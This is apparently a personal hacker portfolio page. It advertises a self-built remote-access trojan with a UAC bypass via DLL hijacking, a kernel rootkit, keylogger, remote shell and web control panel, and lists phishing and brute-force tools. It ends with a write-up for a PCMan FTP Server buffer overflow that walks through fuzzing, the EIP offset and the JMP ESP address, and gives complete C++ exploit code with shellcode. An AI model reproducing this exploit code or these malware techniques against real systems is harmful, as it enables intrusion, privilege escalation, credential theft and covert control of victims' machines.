Hello friend. Hello friend? That’s lame. Maybe I should give you a name? But that’s a slippery slope. You’re only in my head. We have to remember that. Shit. It’s actually happened. I’m talking to an imaginary person. What I’m about to tell you is top secret. A conspiracy bigger than all of us. There’s a powerful group of people out there that are secretly running the world. I’m talking about the guys no one knows about. The guys that are invisible. The top one percent of the top one percent. The guys that play God without permission. And now I think they’re following me.

Hi! as you can see I really love the show MR. Robot.. So I'm from Israel, and I'm intersting in Windows Internals, Malware Development, and currently start stduying about WiFi Hacking.. In the future I'll Build a device that have all of my tools!
What I have study before?: Windows Internals, Windows Drivers, Windows API, C++, C, Assembly, Web Development, Deep Understanding of Social Engineering, Basic Arduino, Basic Linux, PHP and more...

☕ Buy Me a Coffee (:

Hi! Do you want me to help you with something? Im here for you!
Soon I'll Update a contact email, untill then you can send me a message on github! or

☕ Buy Me a Coffee (:

Fsociety RAT
Fsociety Phishing Tool
Auto/Manual UAC Bypass
Kernel Rootkit for Windows 32bit
Brute Force
Binary Exploitation

Fsociety RAT

It was really fun to make this project! This project have a lot of great features and a very good website control for the bots. The final Malware will bypassing UAC, installing rootkit on 32 bit systems, obfuscated strings, Anti-VM technique, Process Hollowing , Communicate with the website control using CURL (curl is preinstalled in every windows!).



RAT

Malware Persistence Techniques


✔️ The malware hiding a DLL to bypass UAC and a Rootkit in new sections.
✔️ Bypassing UAC using UAC hijacking on the program ComputerDefaults.exe in a "Windows " folder.
✔️ Create a task for the malware in Task Schduler in the path "Microsoft\\Windows\\Security" with high privileges.
✔️ If the system is 32-bit install and start the rootkit.
✔️ If the system is 64-bit the malware will start Process Hollowing

Malware Attacks

The malware communicate with a control website, this is the current attacks:


✔️ Screenshot
✔️ Task Scheduler
✔️ Remote Shell
✔️ File Manager
✔️ File Explorer
✔️ Keylogger
✔️ Client Info

Website Control Images

Main website control - list the clients and show info about them

Victim profile page - Contain the attacks options



Rootkit

The Rootkit is for 32-bit systems. Click to see the Rootkit project on GitHub

What the Rootkit can do?

Hook the SSDT


✔️ Protect Files (Read\Write\Create\Delete\Rename\Open\Execute)
✔️ Hide Process
✔️ Protect Process, Thread
✔️ Protect Registry Keys (Open\Create\Delete\Set)
✔️ Bypass privilege checks


DLL - Bypass UAC

Create a DLL that will be hijacked to ComputerDefaults to start the malware with high privilege.

Click to see the BypassUAC project on GitHub


section_injector

This Projects will inject a file to new section in another file.

   Injector.exe "section name" "target" "file"


Websites

Fsociety Control Website

This is the Control Website the malware is communicate with to get the commands to execute.

Fsociety Redirect Website

This website have hardcoded url in the malware code, the malware will get the Control Website url from this website.
I create this website so if there is a problem with the Control Website you can just upload the Control Website again and change the url in this website.



Sub Projects

This solutions was helping me to build the final malware


Initialize RAT

This automated the build of the final malware.


✔️ UPX the DLL file
✔️ Inject the DLL and the Rootkit to new sections.

Encoding_Decoding

This helps me to obfuscate the strings in the malware.



TODO


* Obfuscate Imports



This project is for EDUCATIONAL PURPOSES ONLY. You are the only responsable for your actions! Happy Hacking (;




BypassUAC

Bypassing Windows 10 with mock folder and DLL Hijacking


Hey, I make two projects to bypass UAC:


1. Manual


2. Auto


You will find in each folder (Munual/Auto) a README.md file with explanation!


How it works?

The program will create a "Windows " folder and the windows will think that this is the original "Windows" folder.
The program will copy the "ComputerDefaults.exe" into the "Windows /System32" and then Extract the DLL from the PE section into the "Windows /System32" with the name "Secur32.dll".
Start the ComputerDefaults.exe, and this will perform a DLL Hijacking and BypassUAC. The DLL will start whatever you want.. it can be a CMD or the program that do all of this automatically.




This project is for EDUCATIONAL PURPOSES ONLY. You are the only responsable for your actions! Happy Hacking (;




Kernel Rootkit

Introduction

Hey, after I read the books:


"Windows Kernel Programming" by Pavel Yosifovich
"The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System 2nd Edition" by Bill Blunden

I decide to create a Kernel Rootkit for 32-bit system.
Now I'll start learning how to create a Kernel Rootkit for 64-bit!
Enjoy.

What the Rootkit can do?

Hook the SSDT

✔️ Protect Files (Read\Write\Create\Delete\Rename\Open\Execute)
✔️ Hide Process
✔️ Protect Process, Thread
✔️ Protect Registry Keys (Open\Create\Delete\Set)
✔️ Bypass privilege checks


This project is for EDUCATIONAL PURPOSES ONLY. You are the only responsable for your actions! Happy Hacking (;




Fsociety Phishing Tool

I built this tool 2 years ago using python. In the project GitHub Page you can find what website you can spoof.



This project is for EDUCATIONAL PURPOSES ONLY. You are the only responsable for your actions! Happy Hacking (;




Brute Force Attack

Like the Fsociety Phishing Tool I built this tool 2 years ago using Python.
This project is in GitHub here and have the following Brute Force features:



✔️ Gmail

✔️ SSH

✔️ WIFI

✔️ Zip



This project is for EDUCATIONAL PURPOSES ONLY. You are the only responsable for your actions! Happy Hacking (;




Exploit Writeups - GitHub
PCMAN's FTP Server 2.0

Hey this is my first Exploit Writeup post for practice Binary Exploitation in Windows! I make for myself a folder with a lot of vulnerabilities software with a random name like 48504 and then I choose one randomaly and start investigate the program and exploit it.

File: 9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z

Challenge 1: 45745

After Extract I can see that the exe file name is PCManFTPD2. By the name of the file I can assume that this program is an FTP server or just use the ftp protocol.

When I run the program I can confirm that this program is an FTP server. All of the text in the server is in Chinese so its kind of hard to understand the program.

"PCMan’s FTP Server 2.0 – Copyright © 2005"

After playing a little bit in the server I can see that the server accept a USER anonymous and PASS anonymous to login..


Fuzzing

I try to fuzz the USER option in the server using the SPIKE tool on Kali Linux using the following command: 

  generic_send_tcp 192.168.106.138 21 spike.spk 0 0



The spike.spk file will look like this: 

            s_readline();
            s_string("USER ");
            s_string_variable("0");

And the result is:



We successfully crashed the program!!


Finding the EIP Offset


Let's create a pattern using the following command in Kali Linux: 

    msf-pattern_create -l 5000

Now we can start writing our exploit, I'll write my exploit in C++ on visual studio. 

            #include "C:\\BE\\includes.h"

            /*
                
                PCMan’s FTP Server 2.0 - 'USER' EIP overwrite

                EIP offset: 

                badchars:

            */

            std::string pattern = "…”;

            int main()
            {
                Client c;
                c.Start("192.168.106.138", 21);

                // Receive first message from the server
                std::string temp = "";
                c.Recv(temp);

                std::string exploit = pattern;

                // Start the exploit
                c.Send(exploit);


                return 0;
            }

After we run this program you can see that the ftp server crashed, and the EIP has been overwrite with the value of:43396F43

Using the following command we can get the offset of the EIP:



And we can see that the offset is 2007


Overwrite the EIP


Lets see if we can overwrite the EIP with “BBBB”: 

            #include "C:\\BE\\includes.h"

            /*
                
                PCMan’s FTP Server 2.0 - 'USER' EIP overwrite
            
                EIP offset: 43396F43  ->  [*] Exact match at offset 2007
            
                badchars:
            
            */
            
            int main()
            {
                Client c;
                c.Start("192.168.106.138", 21);
            
                // Receive first message from the server
                std::string temp = "";
                c.Recv(temp);
            
                // Generate A's
                int offset = 2007;
                std::string A = MultipleString("A", offset);
            
                // Generate padding
                std::string padding = MultipleString("D", 5000 - offset - 4);
            
                std::string exploit = A + "BBBB" + padding;
            
                // Start the exploit
                c.Send(exploit);
            
                return 0;
            }

Run the program in Immunity Debugger and see that It's works! The EIP now is "42424242".
We successfully overwrite the EIP!


Find JMP ESP


The next step in our exploit will be the jmp to our shellcode.
Using mona we can search for a JMP ESP, I use the following command in Immunity Debugger: 

   !mona jmp -r ESP

And seem like that mona not found a valid JMP ESP with a Non ASLR, DEP, SafeSEH... I'll keep this first exploit simple and just search for a JMP ESP in KERNEL32.dll:

   !mona jmp -r ESP -m KERNEL32.dll

And the result is: 

                    Address =    7667E8F3
                    Message =    0x7667e8f3 (b+0x0003e8f3)  : jmp esp |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7601.18015 (C:\Windows\system32\kernel32.dll)

Current Exploit:

            #include "C:\\BE\\includes.h"

            /*
                
                PCMan’s FTP Server 2.0 - 'USER' EIP overwrite
                ----------------------------------------------

                EIP offset: 43396F43  ->  [*] Exact match at offset 2007

                JMP ESP:
                    Address=	7667E8F3  ->  "\xf3\xe8\x67\x76"
                    Message=	0x7667e8f3 (b+0x0003e8f3)  : jmp esp |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7601.18015 (C:\Windows\system32\kernel32.dll)
                                



                badchars:

            */

            int main()
            {
                Client c;
                c.Start("192.168.106.138", 21);

                // Receive first message from the server
                std::string temp = "";
                c.Recv(temp);

                // Generate A's
                int offset = 2007;
                std::string A = MultipleString("A", offset);

                // Generate padding
                std::string padding = MultipleString("D", 5000 - offset - 4);

                std::string exploit = A + "\xf3\xe8\x67\x76" + padding;

                // Start the exploit
                c.Send(exploit);

                return 0;
            }

Find Bad Characters


This is not a tutorial so I just generate a badchars and tell you what I found:

The Bad Characters that I found is the following: 

   “\x0a\x0d”

Calculator Shellcode:


I will use this calculator shellcode for our exploit: 

            char calc_shellcode[] =
                "\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
                "\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
                "\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
                "\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
                "\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
                "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7";

Final Exploit


The final exploit is: 

            #include "C:\\BE\\includes.h"

            /*
                
                PCMan’s FTP Server 2.0 - 'USER' EIP overwrite
                ----------------------------------------------

                EIP offset: 43396F43  ->  [*] Exact match at offset 2007

                JMP ESP:
                    Address=	7667E8F3  ->  "\xf3\xe8\x67\x76"
                    Message=	0x7667e8f3 (b+0x0003e8f3)  : jmp esp |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7601.18015 (C:\Windows\system32\kernel32.dll)
                                
                badchars: "\x0a\x0d"

            */

            int main()
            {
                Client c;
                c.Start("192.168.106.138", 21);

                // Receive first message from the server
                std::string temp = "";
                c.Recv(temp);

                // Generate A's
                int offset = 2007;
                std::string A = MultipleString("A", offset);

                // Generate nopsled
                std::string nops = MultipleString("\x90", 20);

                // Shellcode
                char calc_shellcode[] =
                    "\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
                    "\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
                    "\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
                    "\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
                    "\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
                    "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7";

                // Generate padding
                std::string padding = MultipleString("D", 5000 - offset - 4 - nops.length() - (sizeof(calc_shellcode) / sizeof(calc_shellcode[0])));

                std::string exploit = A + "\xf3\xe8\x67\x76" + nops + calc_shellcode + padding;

                // Start the exploit
                c.Send(exploit);

                return 0;
            }

Thanks for reading!